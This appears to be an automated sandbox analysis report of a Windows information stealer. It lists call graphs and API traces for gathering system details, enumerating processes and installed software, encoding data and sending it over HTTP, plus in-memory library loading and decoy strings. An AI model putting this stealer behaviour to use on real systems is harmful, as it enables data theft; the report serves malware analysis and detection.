14802->14803 14804 95a8a0 lstrcpy 14803->14804 14805 951be5 14804->14805 14806 95a9b0 4 API calls 14805->14806 14807 951c05 14806->14807 14808 95a8a0 lstrcpy 14807->14808 14809 951c0e 14808->14809 15517 957690 GetProcessHeap RtlAllocateHeap 14809->15517 14812 95a9b0 4 API calls 14813 951c2e 14812->14813 14814 95a8a0 lstrcpy 14813->14814 14815 951c37 14814->14815 14816 95a9b0 4 API calls 14815->14816 14817 951c56 14816->14817 14818 95a8a0 lstrcpy 14817->14818 14819 951c5f 14818->14819 14820 95a9b0 4 API calls 14819->14820 14821 951c80 14820->14821 14822 95a8a0 lstrcpy 14821->14822 14823 951c89 14822->14823 15524 9577c0 GetCurrentProcess IsWow64Process 14823->15524 14826 95a9b0 4 API calls 14827 951ca9 14826->14827 14828 95a8a0 lstrcpy 14827->14828 14829 951cb2 14828->14829 14830 95a9b0 4 API calls 14829->14830 14831 951cd1 14830->14831 14832 95a8a0 lstrcpy 14831->14832 14833 951cda 14832->14833 14834 95a9b0 4 API calls 14833->14834 14835 951cfb 14834->14835 14836 95a8a0 lstrcpy 14835->14836 14837 951d04 14836->14837 14838 957850 3 API calls 14837->14838 14839 951d14 14838->14839 14840 95a9b0 4 API calls 14839->14840 14841 951d24 14840->14841 14842 95a8a0 lstrcpy 14841->14842 14843 951d2d 14842->14843 14844 95a9b0 4 API calls 14843->14844 14845 951d4c 14844->14845 14846 95a8a0 lstrcpy 14845->14846 14847 951d55 14846->14847 14848 95a9b0 4 API calls 14847->14848 14849 951d75 14848->14849 14850 95a8a0 lstrcpy 14849->14850 14851 951d7e 14850->14851 14852 9578e0 3 API calls 14851->14852 14853 951d8e 14852->14853 14854 95a9b0 4 API calls 14853->14854 14855 951d9e 14854->14855 14856 95a8a0 lstrcpy 14855->14856 14857 951da7 14856->14857 14858 95a9b0 4 API calls 14857->14858 14859 951dc6 14858->14859 14860 95a8a0 lstrcpy 14859->14860 14861 951dcf 14860->14861 14862 95a9b0 4 API calls 14861->14862 14863 951df0 14862->14863 14864 95a8a0 lstrcpy 14863->14864 14865 951df9 14864->14865 15526 957980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14865->15526 14868 95a9b0 4 API calls 14869 951e19 14868->14869 14870 95a8a0 lstrcpy 14869->14870 14871 951e22 14870->14871 14872 95a9b0 4 API calls 14871->14872 14873 951e41 14872->14873 14874 95a8a0 lstrcpy 14873->14874 14875 951e4a 14874->14875 14876 95a9b0 4 API calls 14875->14876 14877 951e6b 14876->14877 14878 95a8a0 lstrcpy 14877->14878 14879 951e74 14878->14879 15528 957a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14879->15528 14882 95a9b0 4 API calls 14883 951e94 14882->14883 14884 95a8a0 lstrcpy 14883->14884 14885 951e9d 14884->14885 14886 95a9b0 4 API calls 14885->14886 14887 951ebc 14886->14887 14888 95a8a0 lstrcpy 14887->14888 14889 951ec5 14888->14889 14890 95a9b0 4 API calls 14889->14890 14891 951ee5 14890->14891 14892 95a8a0 lstrcpy 14891->14892 14893 951eee 14892->14893 15531 957b00 GetUserDefaultLocaleName 14893->15531 14896 95a9b0 4 API calls 14897 951f0e 14896->14897 14898 95a8a0 lstrcpy 14897->14898 14899 951f17 14898->14899 14900 95a9b0 4 API calls 14899->14900 14901 951f36 14900->14901 14902 95a8a0 lstrcpy 14901->14902 14903 951f3f 14902->14903 14904 95a9b0 4 API calls 14903->14904 14905 951f60 14904->14905 14906 95a8a0 lstrcpy 14905->14906 14907 951f69 14906->14907 15535 957b90 14907->15535 14909 951f80 14910 95a920 3 API calls 14909->14910 14911 951f93 14910->14911 14912 95a8a0 lstrcpy 14911->14912 14913 951f9c 14912->14913 14914 95a9b0 4 API calls 14913->14914 14915 951fc6 14914->14915 14916 95a8a0 lstrcpy 14915->14916 14917 951fcf 14916->14917 14918 95a9b0 4 API calls 14917->14918 14919 951fef 14918->14919 14920 95a8a0 lstrcpy 14919->14920 14921 951ff8 14920->14921 15547 957d80 GetSystemPowerStatus 14921->15547 14924 95a9b0 4 API calls 14925 952018 14924->14925 14926 95a8a0 lstrcpy 14925->14926 14927 952021 14926->14927 14928 95a9b0 4 API calls 14927->14928 14929 952040 14928->14929 14930 95a8a0 lstrcpy 14929->14930 14931 952049 14930->14931 14932 95a9b0 4 API calls 14931->14932 14933 95206a 14932->14933 14934 95a8a0 lstrcpy 14933->14934 14935 952073 14934->14935 14936 95207e GetCurrentProcessId 14935->14936 15549 959470 OpenProcess 14936->15549 14939 95a920 3 API calls 14940 9520a4 14939->14940 14941 95a8a0 lstrcpy 14940->14941 14942 9520ad 14941->14942 14943 95a9b0 4 API calls 14942->14943 14944 9520d7 14943->14944 14945 95a8a0 lstrcpy 14944->14945 14946 9520e0 14945->14946 14947 95a9b0 4 API calls 14946->14947 14948 952100 14947->14948 14949 95a8a0 lstrcpy 14948->14949 14950 952109 14949->14950 15554 957e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14950->15554 14953 95a9b0 4 API calls 14954 952129 14953->14954 14955 95a8a0 lstrcpy 14954->14955 14956 952132 14955->14956 14957 95a9b0 4 API calls 14956->14957 14958 952151 14957->14958 14959 95a8a0 lstrcpy 14958->14959 14960 95215a 14959->14960 14961 95a9b0 4 API calls 14960->14961 14962 95217b 14961->14962 14963 95a8a0 lstrcpy 14962->14963 14964 952184 14963->14964 15558 957f60 14964->15558 14967 95a9b0 4 API calls 14968 9521a4 14967->14968 14969 95a8a0 lstrcpy 14968->14969 14970 9521ad 14969->14970 14971 95a9b0 4 API calls 14970->14971 14972 9521cc 14971->14972 14973 95a8a0 lstrcpy 14972->14973 14974 9521d5 14973->14974 14975 95a9b0 4 API calls 14974->14975 14976 9521f6 14975->14976 14977 95a8a0 lstrcpy 14976->14977 14978 9521ff 14977->14978 15571 957ed0 GetSystemInfo wsprintfA 14978->15571 14981 95a9b0 4 API calls 14982 95221f 14981->14982 14983 95a8a0 lstrcpy 14982->14983 14984 952228 14983->14984 14985 95a9b0 4 API calls 14984->14985 14986 952247 14985->14986 14987 95a8a0 lstrcpy 14986->14987 14988 952250 14987->14988 14989 95a9b0 4 API calls 14988->14989 14990 952270 14989->14990 14991 95a8a0 lstrcpy 14990->14991 14992 952279 14991->14992 15573 958100 GetProcessHeap RtlAllocateHeap 14992->15573 14995 95a9b0 4 API calls 14996 952299 14995->14996 14997 95a8a0 lstrcpy 14996->14997 14998 9522a2 14997->14998 14999 95a9b0 4 API calls 14998->14999 15000 9522c1 14999->15000 15001 95a8a0 lstrcpy 15000->15001 15002 9522ca 15001->15002 15003 95a9b0 4 API calls 15002->15003 15004 9522eb 15003->15004 15005 95a8a0 lstrcpy 15004->15005 15006 9522f4 15005->15006 15579 9587c0 15006->15579 15009 95a920 3 API calls 15010 95231e 15009->15010 15011 95a8a0 lstrcpy 15010->15011 15012 952327 15011->15012 15013 95a9b0 4 API calls 15012->15013 15014 952351 15013->15014 15015 95a8a0 lstrcpy 15014->15015 15016 95235a 15015->15016 15017 95a9b0 4 API calls 15016->15017 15018 95237a 15017->15018 15019 95a8a0 lstrcpy 15018->15019 15020 952383 15019->15020 15021 95a9b0 4 API calls 15020->15021 15022 9523a2 15021->15022 15023 95a8a0 lstrcpy 15022->15023 15024 9523ab 15023->15024 15584 9581f0 15024->15584 15026 9523c2 15027 95a920 3 API calls 15026->15027 15028 9523d5 15027->15028 15029 95a8a0 lstrcpy 15028->15029 15030 9523de 15029->15030 15031 95a9b0 4 API calls 15030->15031 15032 95240a 15031->15032 15033 95a8a0 lstrcpy 15032->15033 15034 952413 15033->15034 15035 95a9b0 4 API calls 15034->15035 15036 952432 15035->15036 15037 95a8a0 lstrcpy 15036->15037 15038 95243b 15037->15038 15039 95a9b0 4 API calls 15038->15039 15040 95245c 15039->15040 15041 95a8a0 lstrcpy 15040->15041 15042 952465 15041->15042 15043 95a9b0 4 API calls 15042->15043 15044 952484 15043->15044 15045 95a8a0 lstrcpy 15044->15045 15046 95248d 15045->15046 15047 95a9b0 4 API calls 15046->15047 15048 9524ae 15047->15048 15049 95a8a0 lstrcpy 15048->15049 15050 9524b7 15049->15050 15592 958320 15050->15592 15052 9524d3 15053 95a920 3 API calls 15052->15053 15054 9524e6 15053->15054 15055 95a8a0 lstrcpy 15054->15055 15056 9524ef 15055->15056 15057 95a9b0 4 API calls 15056->15057 15058 952519 15057->15058 15059 95a8a0 lstrcpy 15058->15059 15060 952522 15059->15060 15061 95a9b0 4 API calls 15060->15061 15062 952543 15061->15062 15063 95a8a0 lstrcpy 15062->15063 15064 95254c 15063->15064 15065 958320 17 API calls 15064->15065 15066 952568 15065->15066 15067 95a920 3 API calls 15066->15067 15068 95257b 15067->15068 15069 95a8a0 lstrcpy 15068->15069 15070 952584 15069->15070 15071 95a9b0 4 API calls 15070->15071 15072 9525ae 15071->15072 15073 95a8a0 lstrcpy 15072->15073 15074 9525b7 15073->15074 15075 95a9b0 4 API calls 15074->15075 15076 9525d6 15075->15076 15077 95a8a0 lstrcpy 15076->15077 15078 9525df 15077->15078 15079 95a9b0 4 API calls 15078->15079 15080 952600 15079->15080 15081 95a8a0 lstrcpy 15080->15081 15082 952609 15081->15082 15628 958680 15082->15628 15084 952620 15085 95a920 3 API calls 15084->15085 15086 952633 15085->15086 15087 95a8a0 lstrcpy 15086->15087 15088 95263c 15087->15088 15089 95265a lstrlen 15088->15089 15090 95266a 15089->15090 15091 95a740 lstrcpy 15090->15091 15092 95267c 15091->15092 15093 941590 lstrcpy 15092->15093 15094 95268d 15093->15094 15638 955190 15094->15638 15096 952699 15096->13528 15826 95aad0 15097->15826 15099 945009 InternetOpenUrlA 15100 945021 15099->15100 15101 9450a0 InternetCloseHandle InternetCloseHandle 15100->15101 15102 94502a InternetReadFile 15100->15102 15103 9450ec 15101->15103 15102->15100 15103->13532 15827 9498d0 15104->15827 15106 950759 15107 95077d 15106->15107 15108 950a38 15106->15108 15111 950799 StrCmpCA 15107->15111 15109 941590 lstrcpy 15108->15109 15110 950a49 15109->15110 16003 950250 15110->16003 15113 950843 15111->15113 15114 9507a8 15111->15114 15117 950865 StrCmpCA 15113->15117 15116 95a7a0 lstrcpy 15114->15116 15118 9507c3 15116->15118 15119 950874 15117->15119 15156 95096b 15117->15156 15120 941590 lstrcpy 15118->15120 15121 95a740 lstrcpy 15119->15121 15122 95080c 15120->15122 15124 950881 15121->15124 15125 95a7a0 lstrcpy 15122->15125 15123 95099c StrCmpCA 15126 950a2d 15123->15126 15127 9509ab 15123->15127 15128 95a9b0 4 API calls 15124->15128 15129 950823 15125->15129 15126->13536 15130 941590 lstrcpy 15127->15130 15131 9508ac 15128->15131 15132 95a7a0 lstrcpy 15129->15132 15133 9509f4 15130->15133 15134 95a920 3 API calls 15131->15134 15135 95083e 15132->15135 15136 95a7a0 lstrcpy 15133->15136 15137 9508b3 15134->15137 15830 94fb00 15135->15830 15139 950a0d 15136->15139 15140 95a9b0 4 API calls 15137->15140 15141 95a7a0 lstrcpy 15139->15141 15142 9508ba 15140->15142 15143 950a28 15141->15143 15144 95a8a0 lstrcpy 15142->15144 15946 950030 15143->15946 15156->15123 15478 95a7a0 lstrcpy 15477->15478 15479 941683 15478->15479 15480 95a7a0 lstrcpy 15479->15480 15481 941695 15480->15481 15482 95a7a0 lstrcpy 15481->15482 15483 9416a7 15482->15483 15484 95a7a0 lstrcpy 15483->15484 15485 9415a3 15484->15485 15485->14359 15487 9447c6 15486->15487 15488 944838 lstrlen 15487->15488 15512 95aad0 15488->15512 15490 944848 InternetCrackUrlA 15491 944867 15490->15491 15491->14436 15493 95a740 lstrcpy 15492->15493 15494 958b74 15493->15494 15495 95a740 lstrcpy 15494->15495 15496 958b82 GetSystemTime 15495->15496 15497 958b99 15496->15497 15498 95a7a0 lstrcpy 15497->15498 15499 958bfc 15498->15499 15499->14451 15501 95a931 15500->15501 15502 95a988 15501->15502 15504 95a968 lstrcpy lstrcat 15501->15504 15503 95a7a0 lstrcpy 15502->15503 15505 95a994 15503->15505 15504->15502 15505->14454 15506->14569 15508 949af9 LocalAlloc 15507->15508 15509 944eee 15507->15509 15508->15509 15510 949b14 CryptStringToBinaryA 15508->15510 15509->14457 15509->14459 15510->15509 15511 949b39 LocalFree 15510->15511 15511->15509 15512->15490 15513->14579 15514->14720 15515->14722 15516->14730 15645 9577a0 15517->15645 15520 9576c6 RegOpenKeyExA 15522 957704 RegCloseKey 15520->15522 15523 9576e7 RegQueryValueExA 15520->15523 15521 951c1e 15521->14812 15522->15521 15523->15522 15525 951c99 15524->15525 15525->14826 15527 951e09 15526->15527 15527->14868 15529 951e84 15528->15529 15530 957a9a wsprintfA 15528->15530 15529->14882 15530->15529 15532 951efe 15531->15532 15533 957b4d 15531->15533 15532->14896 15652 958d20 LocalAlloc CharToOemW 15533->15652 15536 95a740 lstrcpy 15535->15536 15537 957bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15536->15537 15546 957c25 15537->15546 15538 957c46 GetLocaleInfoA 15538->15546 15539 957d18 15540 957d1e LocalFree 15539->15540 15541 957d28 15539->15541 15540->15541 15543 95a7a0 lstrcpy 15541->15543 15542 95a9b0 lstrcpy lstrlen lstrcpy lstrcat 15542->15546 15544 957d37 15543->15544 15544->14909 15545 95a8a0 lstrcpy 15545->15546 15546->15538 15546->15539 15546->15542 15546->15545 15548 952008 15547->15548 15548->14924 15550 9594b5 15549->15550 15551 959493 GetModuleFileNameExA CloseHandle 15549->15551 15552 95a740 lstrcpy 15550->15552 15551->15550 15553 952091 15552->15553 15553->14939 15555 952119 15554->15555 15556 957e68 RegQueryValueExA 15554->15556 15555->14953 15557 957e8e RegCloseKey 15556->15557 15557->15555 15559 957fb9 GetLogicalProcessorInformationEx 15558->15559 15560 957fd8 GetLastError 15559->15560 15563 958029 15559->15563 15566 957fe3 15560->15566 15570 958022 15560->15570 15564 9589f0 2 API calls 15563->15564 15567 95807b 15564->15567 15565 9589f0 2 API calls 15568 952194 15565->15568 15566->15559 15566->15568 15653 9589f0 15566->15653 15656 958a10 GetProcessHeap RtlAllocateHeap 15566->15656 15569 958084 wsprintfA 15567->15569 15567->15570 15568->14967 15569->15568 15570->15565 15570->15568 15572 95220f 15571->15572 15572->14981 15574 9589b0 15573->15574 15575 95814d GlobalMemoryStatusEx 15574->15575 15576 958163 15575->15576 15577 95819b wsprintfA 15576->15577 15578 952289 15577->15578 15578->14995 15580 9587fb GetProcessHeap RtlAllocateHeap wsprintfA 15579->15580 15582 95a740 lstrcpy 15580->15582 15583 95230b 15582->15583 15583->15009 15585 95a740 lstrcpy 15584->15585 15591 958229 15585->15591 15586 958263 15587 95a7a0 lstrcpy 15586->15587 15589 9582dc 15587->15589 15588 95a9b0 lstrcpy lstrlen lstrcpy lstrcat 15588->15591 15589->15026 15590 95a8a0 lstrcpy 15590->15591 15591->15586 15591->15588 15591->15590 15593 95a740 lstrcpy 15592->15593 15594 95835c RegOpenKeyExA 15593->15594 15595 9583d0 15594->15595 15596 9583ae 15594->15596 15598 958613 RegCloseKey 15595->15598 15599 9583f8 RegEnumKeyExA 15595->15599 15597 95a7a0 lstrcpy 15596->15597 15608 9583bd 15597->15608 15602 95a7a0 lstrcpy 15598->15602 15600 95843f wsprintfA RegOpenKeyExA 15599->15600 15601 95860e 15599->15601 15603 958485 RegCloseKey RegCloseKey 15600->15603 15604 9584c1 RegQueryValueExA 15600->15604 15601->15598 15602->15608 15605 95a7a0 lstrcpy 15603->15605 15606 958601 RegCloseKey 15604->15606 15607 9584fa lstrlen 15604->15607 15605->15608 15606->15601 15607->15606 15609 958510 15607->15609 15608->15052 15610 95a9b0 4 API calls 15609->15610 15611 958527 15610->15611 15612 95a8a0 lstrcpy 15611->15612 15613 958533 15612->15613 15614 95a9b0 4 API calls 15613->15614 15615 958557 15614->15615 15616 95a8a0 lstrcpy 15615->15616 15617 958563 15616->15617 15618 95856e RegQueryValueExA 15617->15618 15618->15606 15619 9585a3 15618->15619 15620 95a9b0 4 API calls 15619->15620 15621 9585ba 15620->15621 15622 95a8a0 lstrcpy 15621->15622 15623 9585c6 15622->15623 15624 95a9b0 4 API calls 15623->15624 15625 9585ea 15624->15625 15626 95a8a0 lstrcpy 15625->15626 15627 9585f6 15626->15627 15627->15606 15629 95a740 lstrcpy 15628->15629 15630 9586bc CreateToolhelp32Snapshot Process32First 15629->15630 15631 95875d CloseHandle 15630->15631 15632 9586e8 Process32Next 15630->15632 15633 95a7a0 lstrcpy 15631->15633 15632->15631 15637 9586fd 15632->15637 15636 958776 15633->15636 15634 95a9b0 lstrcpy lstrlen lstrcpy lstrcat 15634->15637 15635 95a8a0 lstrcpy 15635->15637 15636->15084 15637->15632 15637->15634 15637->15635 15639 95a7a0 lstrcpy 15638->15639 15640 9551b5 15639->15640 15641 941590 lstrcpy 15640->15641 15642 9551c6 15641->15642 15657 945100 15642->15657 15644 9551cf 15644->15096 15648 957720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15645->15648 15647 9576b9 15647->15520 15647->15521 15649 957765 RegQueryValueExA 15648->15649 15650 957780 RegCloseKey 15648->15650 15649->15650 15651 957793 15650->15651 15651->15647 15652->15532 15654 958a0c 15653->15654 15655 9589f9 GetProcessHeap HeapFree 15653->15655 15654->15566 15655->15654 15656->15566 15658 95a7a0 lstrcpy 15657->15658 15659 945119 15658->15659 15660 9447b0 2 API calls 15659->15660 15661 945125 15660->15661 15817 958ea0 15661->15817 15663 945184 15664 945192 lstrlen 15663->15664 15665 9451a5 15664->15665 15666 958ea0 4 API calls 15665->15666 15667 9451b6 15666->15667 15668 95a740 lstrcpy 15667->15668 15669 9451c9 15668->15669 15670 95a740 lstrcpy 15669->15670 15671 9451d6 15670->15671 15672 95a740 lstrcpy 15671->15672 15673 9451e3 15672->15673 15674 95a740 lstrcpy 15673->15674 15675 9451f0 15674->15675 15676 95a740 lstrcpy 15675->15676 15677 9451fd InternetOpenA StrCmpCA 15676->15677 15678 94522f 15677->15678 15679 9458c4 InternetCloseHandle 15678->15679 15680 958b60 3 API calls 15678->15680 15686 9458d9 ctype 15679->15686 15681 94524e 15680->15681 15682 95a920 3 API calls 15681->15682 15683 945261 15682->15683 15684 95a8a0 lstrcpy 15683->15684 15685 94526a 15684->15685 15687 95a9b0 4 API calls 15685->15687 15690 95a7a0 lstrcpy 15686->15690 15688 9452ab 15687->15688 15689 95a920 3 API calls 15688->15689 15691 9452b2 15689->15691 15699 945913 15690->15699 15692 95a9b0 4 API calls 15691->15692 15693 9452b9 15692->15693 15694 95a8a0 lstrcpy 15693->15694 15695 9452c2 15694->15695 15696 95a9b0 4 API calls 15695->15696 15697 945303 15696->15697 15698 95a920 3 API calls 15697->15698 15700 94530a 15698->15700 15699->15644 15701 95a8a0 lstrcpy 15700->15701 15702 945313 15701->15702 15703 945329 InternetConnectA 15702->15703 15703->15679 15704 945359 HttpOpenRequestA 15703->15704 15706 9458b7 InternetCloseHandle 15704->15706 15707 9453b7 15704->15707 15706->15679 15708 95a9b0 4 API calls 15707->15708 15709 9453cb 15708->15709 15710 95a8a0 lstrcpy 15709->15710 15711 9453d4 15710->15711 15712 95a920 3 API calls 15711->15712 15713 9453f2 15712->15713 15714 95a8a0 lstrcpy 15713->15714 15715 9453fb 15714->15715 15716 95a9b0 4 API calls 15715->15716 15717 94541a 15716->15717 15718 95a8a0 lstrcpy 15717->15718 15719 945423 15718->15719 15720 95a9b0 4 API calls 15719->15720 15721 945444 15720->15721 15722 95a8a0 lstrcpy 15721->15722 15723 94544d 15722->15723 15724 95a9b0 4 API calls 15723->15724 15725 94546e 15724->15725 15818 958ead CryptBinaryToStringA 15817->15818 15822 958ea9 15817->15822 15819 958ece GetProcessHeap RtlAllocateHeap 15818->15819 15818->15822 15820 958ef4 ctype 15819->15820 15819->15822 15821 958f05 CryptBinaryToStringA 15820->15821 15821->15822 15822->15663 15826->15099 16069 949880 15827->16069 15829 9498e1 15829->15106 15831 95a740 lstrcpy 15830->15831 16004 95a740 lstrcpy 16003->16004 16005 950266 16004->16005 16006 958de0 2 API calls 16005->16006 16007 95027b 16006->16007 16008 95a920 3 API calls 16007->16008 16009 95028b 16008->16009 16010 95a8a0 lstrcpy 16009->16010 16011 950294 16010->16011 16012 95a9b0 4 API calls 16011->16012 16070 94988d 16069->16070 16073 946fb0 16070->16073 16072 9498ad ctype 16072->15829 16076 946d40 16073->16076 16077 946d63 16076->16077 16087 946d59 16076->16087 16092 946530 16077->16092 16081 946dbe 16081->16087 16102 9469b0 16081->16102 16083 946e2a 16084 946ee6 VirtualFree 16083->16084 16086 946ef7 16083->16086 16083->16087 16084->16086 16085 946f41 16085->16087 16090 9589f0 2 API calls 16085->16090 16086->16085 16088 946f26 FreeLibrary 16086->16088 16089 946f38 16086->16089 16087->16072 16088->16086 16091 9589f0 2 API calls 16089->16091 16090->16087 16091->16085 16093 946542 16092->16093 16095 946549 16093->16095 16112 958a10 GetProcessHeap RtlAllocateHeap 16093->16112 16095->16087 16096 946660 16095->16096 16099 94668f VirtualAlloc 16096->16099 16098 946730 16100 946743 VirtualAlloc 16098->16100 16101 94673c 16098->16101 16099->16098 16099->16101 16100->16101 16101->16081 16103 9469c9 16102->16103 16108 9469d5 16102->16108 16104 946a09 LoadLibraryA 16103->16104 16103->16108 16105 946a32 16104->16105 16104->16108 16106 946ae0 16105->16106 16113 958a10 GetProcessHeap RtlAllocateHeap 16105->16113 16106->16108 16109 946ba8 GetProcAddress 16106->16109 16108->16083 16109->16106 16109->16108 16110 9589f0 2 API calls 16110->16106 16111 946a8b 16111->16108 16111->16110 16112->16095 16113->16111

                                    Executed Functions

                                    Function 00959860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 959860-959874 call 959750 663 959a93-959af2 LoadLibraryA * 5 660->663 664 95987a-959a8e call 959780 GetProcAddress * 21 660->664 666 959af4-959b08 GetProcAddress 663->666 667 959b0d-959b14 663->667 664->663 666->667 669 959b46-959b4d 667->669 670 959b16-959b41 GetProcAddress * 2 667->670 671 959b4f-959b63 GetProcAddress 669->671 672 959b68-959b6f 669->672 670->669 671->672 673 959b71-959b84 GetProcAddress 672->673 674 959b89-959b90 672->674 673->674 675 959bc1-959bc2 674->675 676 959b92-959bbc GetProcAddress * 2 674->676 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,015E0588), ref: 009598A1
                                    • GetProcAddress.KERNEL32(75900000,015E0738), ref: 009598BA
                                    • GetProcAddress.KERNEL32(75900000,015E0750), ref: 009598D2
                                    • GetProcAddress.KERNEL32(75900000,015E07B0), ref: 009598EA
                                    • GetProcAddress.KERNEL32(75900000,015E0768), ref: 00959903
                                    • GetProcAddress.KERNEL32(75900000,015E8840), ref: 0095991B
                                    • GetProcAddress.KERNEL32(75900000,015D6400), ref: 00959933
                                    • GetProcAddress.KERNEL32(75900000,015D6480), ref: 0095994C
                                    • GetProcAddress.KERNEL32(75900000,015E07C8), ref: 00959964
                                    • GetProcAddress.KERNEL32(75900000,015E07E0), ref: 0095997C
                                    • GetProcAddress.KERNEL32(75900000,015E07F8), ref: 00959995
                                    • GetProcAddress.KERNEL32(75900000,015E0558), ref: 009599AD
                                    • GetProcAddress.KERNEL32(75900000,015D6460), ref: 009599C5
                                    • GetProcAddress.KERNEL32(75900000,015E05A0), ref: 009599DE
                                    • GetProcAddress.KERNEL32(75900000,015E0810), ref: 009599F6
                                    • GetProcAddress.KERNEL32(75900000,015D63C0), ref: 00959A0E
                                    • GetProcAddress.KERNEL32(75900000,015E0840), ref: 00959A27
                                    • GetProcAddress.KERNEL32(75900000,015E08A0), ref: 00959A3F
                                    • GetProcAddress.KERNEL32(75900000,015D6300), ref: 00959A57
                                    • GetProcAddress.KERNEL32(75900000,015E0900), ref: 00959A70
                                    • GetProcAddress.KERNEL32(75900000,015D6640), ref: 00959A88
                                    • LoadLibraryA.KERNEL32(015E0918,?,00956A00), ref: 00959A9A
                                    • LoadLibraryA.KERNEL32(015E0870,?,00956A00), ref: 00959AAB
                                    • LoadLibraryA.KERNEL32(015E08E8,?,00956A00), ref: 00959ABD
                                    • LoadLibraryA.KERNEL32(015E0888,?,00956A00), ref: 00959ACF
                                    • LoadLibraryA.KERNEL32(015E0858,?,00956A00), ref: 00959AE0
                                    • GetProcAddress.KERNEL32(75070000,015E08B8), ref: 00959B02
                                    • GetProcAddress.KERNEL32(75FD0000,015E08D0), ref: 00959B23
                                    • GetProcAddress.KERNEL32(75FD0000,015E8C58), ref: 00959B3B
                                    • GetProcAddress.KERNEL32(75A50000,015E8E80), ref: 00959B5D
                                    • GetProcAddress.KERNEL32(74E50000,015D64C0), ref: 00959B7E
                                    • GetProcAddress.KERNEL32(76E80000,015E8950), ref: 00959B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00959BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00959BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 6b4639d02e7efe75637739758fa23ce1957a738c93c084bbb72228c489a5f5e1
                                    • Instruction ID: 57dd964ab12eba0eff655d626c4395ef212463096516d82934a5714f9a8abe3a
                                    • Opcode Fuzzy Hash: 6b4639d02e7efe75637739758fa23ce1957a738c93c084bbb72228c489a5f5e1
                                    • Instruction Fuzzy Hash: 2AA12AB95002409FF344EFA8ED88A663BF9F78C701714451BA605D3274DF39A852EB63
                                    Function 009445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 9445c0-944695 RtlAllocateHeap 781 9446a0-9446a6 764->781 782 9446ac-94474a 781->782 783 94474f-9447a9 VirtualProtect 781->783 782->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0094460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0094479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009446B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009445DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009446D8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009445C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009446C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0094475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009445D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00944765
